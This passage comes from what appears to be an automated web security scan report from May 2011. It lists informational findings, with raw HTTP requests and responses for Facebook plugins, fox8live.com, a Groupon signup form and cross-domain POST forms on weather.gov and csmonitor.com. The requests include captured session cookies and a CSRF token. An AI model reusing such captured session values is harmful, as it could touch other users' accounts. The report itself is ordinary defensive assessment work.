<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js"></script>
<script type="text/javascript">window.Bootloader && Bootloader.done(["lIKWr"]);</script></head><body class="plugin transparent_widget safari4 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4dc809b4dea5f8b43355623" class="connect_widget button_count" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">27K</div></td></tr></tbody></table></td><td class="connect_widget_button_count
...[SNIP]...

15.7. http://www.facebook.com/plugins/recommendations.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/recommendations.php

Request 1

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.25.50
X-Cnection: close
Date: Mon, 09 May 2011 15:35:07 GMT
Content-Length: 19190

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="csmonitor.com" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_1" value="http://www.csmonitor.com/Business" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u530759_2"><input value="Sign Up" type="submit" id="u530759_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u530759_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_6b52e61bddc969e3"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" title="How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0503-martin-luther-king-quotes/10049983-1-eng-US/0503-martin-luther-king-quotes_thumbnail_90.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" target="_top">How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote</a></strong><div class="recommendations_metadata">8,739 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_776119d85571861e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Society/2011/0505/Cinco-de-Mayo-Six-fun-facts-about-the-Fifth-of-May" title="Cinco de 
Mayo: Six fun facts about the Fifth
...[SNIP]...

Request 2

GET /plugins/recommendations.php?site=www.csmonitor.com&width=270&height=590&header=false&colorscheme=light&font=arial&border_color=%23fff HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.62.38
X-Cnection: close
Date: Mon, 09 May 2011 15:35:44 GMT
Content-Length: 19097

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="" type="hidden" /><input name="placement" value="recommendations" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u534452_2"><input value="Sign Up" type="submit" id="u534452_2" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u534452_1&quot;).login();"><b>log in</b></a> to see what your friends are recommending.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbRecommendationWidgetContent" style="visibility:hidden;"><div class="UIImageBlock clearfix pas fbRecommendation RES_6b52e61bddc969e3"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" title="How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote" target="_top"><img class="img" src="http://www.csmonitor.com/var/ezflow_site/storage/images/media/images/0503-martin-luther-king-quotes/10049983-1-eng-US/0503-martin-luther-king-quotes_thumbnail_90.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.csmonitor.com/Innovation/Horizons/2011/0503/How-Osama-bin-Laden-s-death-sparked-a-fake-Martin-Luther-King-quote" target="_top">How Osama bin Laden&#039;s death sparked a fake Martin Luther King quote</a></strong><div class="recommendations_metadata">8,739 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_776119d85571861e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.csmonitor.com/USA/Society/2011/0505/Cinco-de-Mayo-Six-fun-facts-about-the-Fifth-of-May" title="Cinco de Mayo: Six fun facts about the Fifth of May" target="_top"><img class="img" 
src="http://www.csmonitor.com/var/ezflow_site/storage
...[SNIP]...

15.8. http://www.fox8live.com/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fox8live.com
Path:   /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx

Request 1

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/wireless/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response 1

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:38 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57286
Connection: keep-alive
Content-Length: 57286


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
src="http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif?js=0&amp;pv=0&amp;lc=http%3a%2f%2fwww.fox8live.com%2fmostpopular%2fstory.aspx%3fcontent_id%3dywVthjF5R0-TVfelFm18GA%26&amp;rf=http%3a%2f%2fwww.fox8live.com%2fwireless%2fdefault.aspx" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
</noscript>
<!-- END: NetTracker Page Tag -->
<!-- Start Quantcast tag -->
<script type="text/javascript">
_qoptions={
qacct:"p-3eDTKkJu0A1JU",
labels:""
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3eDTKkJu0A1JU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->

<form name="aspnetForm" method="post" action="/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
<input type="hidden" name="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_answer" id="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_answer" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_encrypted" id="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_encrypted" value="i7wpuRFyrpFili5QNbqWeN5ub9B3gPZ0cY6cOwpQHmE=" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ9kFgICAw9kFgQCGw9kFgJmD2QWBgIBDxAPZBYCHghvbkNoYW5nZQV6ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFN
...[SNIP]...

Request 2

GET /mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response 2

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:41:43 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n33), ms iad-agg-n33 ( origin)
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 57231
Connection: keep-alive
Content-Length: 57231


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta name="descripti
...[SNIP]...
src="http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif?js=0&amp;pv=0&amp;lc=http%3a%2f%2fwww.fox8live.com%2fmostpopular%2fstory.aspx%3fcontent_id%3dywVthjF5R0-TVfelFm18GA%26&amp;rf=" height="1" width="1" border="0" hspace="0" vspace="0" alt="" />
</noscript>
<!-- END: NetTracker Page Tag -->
<!-- Start Quantcast tag -->
<script type="text/javascript">
_qoptions={
qacct:"p-3eDTKkJu0A1JU",
labels:""
};
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<img src="http://pixel.quantserve.com/pixel/p-3eDTKkJu0A1JU.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/>
</noscript>
<!-- End Quantcast tag -->

<form name="aspnetForm" method="post" action="/mostpopular/story/Bonnet-Carre-Spillway-impact-on-Lake-Pontchartrain/ywVthjF5R0-TVfelFm18GA.cspx" onsubmit="javascript:return WebForm_OnSubmit();" id="aspnetForm">
<div>
<input type="hidden" name="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_answer" id="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_answer" value="" />
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_encrypted" id="ctl00_ctl00_ctl00_ctl00_CommonPage_CommonBody_CommonContent_CommonLeftColumn_Main_V___EmailStoryWindow_EmailStoryControl___iCap_encrypted" value="3Qsnum5DiBLhIIHhxqhyNwr4C5/zZb7hlH0fFlCUCIc=" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzOTYxNzMwOTQPZBYCZg9kFgJmD2QWAmYPZBYCZg9kFgICBQ9kFgICAw9kFgQCGw9kFgJmD2QWBgIBDxAPZBYCHghvbkNoYW5nZQV6ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ2N0bDAwX2N0bDAwX2N0bDAwX2N0bDAwX0NvbW1vblBhZ2VfU2VhcmNoQmFyX19fUG93ZXJlZEJ5Jykuc3JjID0gdGhpc1t0aGlzLnNlbGVjdGVkSW5kZXhdLmltZ1VybDsPFgJmAgEWAhAFEFNlYXJjaCBUaGlzIFNpdGUFAzI2NWcQBQ5TZWFyY2ggdGhlIFdlYgUDMjY2Z2RkAgMPD2QWAh
...[SNIP]...

15.9. https://www.groupon.com/users

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.groupon.com
Path:   /users

Request 1

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Referer: https://www.groupon.com/users/new
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response 1

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:13 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:13 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/users/new
X-Runtime: 62
Cache-Control: no-cache
Content-Length: 99

<html><body>You are being <a href="https://www.groupon.com/users/new">redirected</a>.</body></html>

Request 2

POST /users HTTP/1.1
Host: www.groupon.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://www.groupon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _tpaid=mbe; _tpref=http%3A%2F%2Fshare.meebo.com%2Fcim%2Fwhitev4.html; conversion_val=; _tpmed=cpc; _tpcid=q4; b=fae0ec84-7a51-11e0-9df0-0050569504f2; s=fae0fb02-7a51-11e0-9df0-0050569504f2; __utmz=44473723.1304955341.1.1.utmcsr=mbe|utmccn=q4|utmcmd=cpc|utmcct=2s208; __utmv=; _chartbeat2=gzdl5mb0frlvfs2p; __utma=44473723.870427670.1304955341.1304955341.1304955341.1; __utmc=44473723; __utmb=44473723.4.9.1304955365962; NREUM=s=1304955365968; adchemy_id=; division=dallas; _thepoint=8dd18fc853ae097ffe774ef38887ee55
Content-Length: 231

authenticity_token=ICfp1OvnKSBwXOdEcwa6DN9FNr34UQxyH%2FNwl5Q3Ga4%3D&user%5Bfull_name%5D=&user%5Bemail_address%5D=&user%5Bpassword%5D=&user%5Bpassword_confirmation%5D=&user%5Baccept_terms%5D=0&user%5Ba
...[SNIP]...

Response 2

HTTP/1.1 302 Moved Temporarily
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:36:43 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: adchemy_id=; path=/
Set-Cookie: division=dallas; path=/; expires=Thu, 09-Jun-2011 15:36:42 GMT
Set-Cookie: mobile=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: auth_token=; domain=.groupon.com; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: _thepoint=8dd18fc853ae097ffe774ef38887ee55; domain=.groupon.com; path=/; expires=Tue, 10 May 2011 15:36:43 GMT; HttpOnly
Status: 302
Location: https://www.groupon.com/
X-Runtime: 627
Cache-Control: no-cache
Content-Length: 90

<html><body>You are being <a href="https://www.groupon.com/">redirected</a>.</body></html>

16. Cross-domain POST
There are 4 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


16.1. http://radar.weather.gov/Conus/index.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /Conus/index.php

Issue detail

The page contains a form which POSTs data to the domain www.srh.noaa.gov. The form contains the following fields:

Request

GET /Conus/index.php HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://www.srh.noaa.gov/lmrfc/quickbrief.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=299
Expires: Mon, 09 May 2011 15:41:39 GMT
Date: Mon, 09 May 2011 15:36:40 GMT
Connection: close
Content-Length: 61964

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head>
<title>NWS - Doppler Radar National Mosaic</title>
<meta name="title" content="NWS -
...[SNIP]...
</span><form method="POST" action="http://www.srh.noaa.gov/zipcity.php">&nbsp; &nbsp;<span class="searchinput">
...[SNIP]...

16.2. http://radar.weather.gov/radar.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://radar.weather.gov
Path:   /radar.php

Issue detail

The page contains a form which POSTs data to the domain www.srh.noaa.gov. The form contains the following fields:

Request

GET /radar.php?rid=hdx&product=N0R&overlay=11101111&loop=no HTTP/1.1
Host: radar.weather.gov
Proxy-Connection: keep-alive
Referer: http://radar.weather.gov/Conus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=31
Expires: Mon, 09 May 2011 15:38:29 GMT
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close
Content-Length: 25348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head>
<title>NWS radar image from Holloman Air Force Base, NM</title>
<meta name=
...[SNIP]...
</span><form method="POST" action="http://www.srh.noaa.gov/zipcity.php">&nbsp;&nbsp;<span class="searchinput">
...[SNIP]...

16.3. http://www.csmonitor.com/Business

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

Request

GET /Business HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; s_cc=true; s_nr=1304955268151-New; c_m=undefinedburpburp; rvd=1304955268153%3E0%3A1; rvd_s=1; s_depth=4; s_lv=1304955268156; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843268157%26vn%3D1; s_monthinvisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Vary: Accept-Encoding
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=19
Expires: Mon, 09 May 2011 15:35:12 GMT
Date: Mon, 09 May 2011 15:34:53 GMT
Connection: close
Content-Length: 83875

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


        <title> B
...[SNIP]...
<div id="sign-up-form">
       <form name="form" style="padding: 0; margin: 0;" method="post" action="http://links.mkt1259.com/servlet/UserSignUp?f=231711&postMethod=HTML&m=0&j=MAS2">
       <!-- e-mail field -->
...[SNIP]...

16.4. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The page contains a form which POSTs data to the domain links.mkt1259.com. The form contains the following fields:

Request

GET /Business/2011/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: Apache/2.2.12 (Ubuntu)
Content-Type: text/html; charset=utf-8
X-Powered-By: eZ Publish
Vary: Accept-Encoding
Content-Language: en-US
Served-by:
Pragma:
Cache-Control: max-age=73
Expires: Mon, 09 May 2011 15:39:13 GMT
Date: Mon, 09 May 2011 15:38:00 GMT
Connection: close
Content-Length: 74098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


    <title> Ga
...[SNIP]...
<div id="sign-up-form">
       <form name="form" style="padding: 0; margin: 0;" method="post" action="http://links.mkt1259.com/servlet/UserSignUp?f=231711&postMethod=HTML&m=0&j=MAS2">
       <!-- e-mail field -->
...[SNIP]...

17. Cross-domain Referer leakage
There are 35 instances of this issue:

Issue background

